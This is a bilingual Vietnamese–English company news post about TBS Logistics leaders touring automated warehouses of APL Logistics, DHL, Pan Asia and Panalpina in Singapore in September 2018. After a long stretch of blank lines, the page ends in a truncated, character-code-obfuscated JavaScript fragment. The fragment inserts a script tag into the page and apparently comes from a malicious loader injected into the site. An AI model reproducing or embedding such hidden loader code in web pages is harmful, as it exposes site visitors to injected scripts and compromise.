Tham quan hệ thống kho tại Singapore

Ngày 18/09/2018 – 21/09/2018 vừa qua, Ban Lãnh Đạo công ty TBS Logistics đã tổ chức thành công chuyến tham quan thực tế hoạt động của các hệ thống kho tự động tiên tiến, hiện đại như APL Logistics, DHL, Expeditor, Pan Asia, Panalpina,… tại Singapore.

TBS Logistics Company Leaders successfully organized a visit site from  September 18tht, 2018 to September 21st , 2018 to the warehouse systems of APL Logistics, DHL, Expeditor, Pan Asia, Panalpina, etc… in Singapore in order to find out how to operate the automatically advanced modern warehouses.

Các đối tác giới thiệu và hướng dẫn TBS tham quan thực tế hệ thống kho bãi ( Hình ảnh: tại kho Pan Asia), trực tiếp quan sát các quy trình làm việc, hoạt động nhập xuất hàng hóa và tìm hiểu về hệ thống tự động hóa tại kho.

TBS was practically introduced about the warehouse systems ( Photo: at Pan Asia Warehouse), then sight directly the process of working, import-export procedure and automation system inside of these warehouse.

Nhóm TBS Logistics tham quan tầng thượng – bãi đỗ xe container, xe tải nhập xuất hàng.

 Above photo is container-truck park on the top floor used for outbound cargo.

 

Hình ảnh tại APL Logistics

Photo: APL Logistics Office

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Đại diện TBS – Ông Lê Duy Khanh trao tặng phần quà cho Panalpina

TBS Logistics representatives – Mr.Le Duy Khanh give a gift to Panalpina

Thông qua chuyến tham quan tại Singapore, TBS Logistics đã có góc nhìn khách quan và chân thực về mô hình vận hành kho bãi theo quy chuẩn quốc tế. Có thêm kinh nghiệm trong lĩnh vực logistics nhằm áp dụng, khắc phục và cải tiến chất lượng dịch vụ, để mang đến dịch vụ chuỗi tốt nhất cho khách hàng, khẳng định giá trị TBS Logistics đang hướng tới.

Thanks to such business trip in Singapore, TBS Logistics had a chance to widen more the professional knowledge of operation model according to international standards. Then has applied for improvement the quality service and confirmed firmly the further value of TBS Logistics.

 

 

 16,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));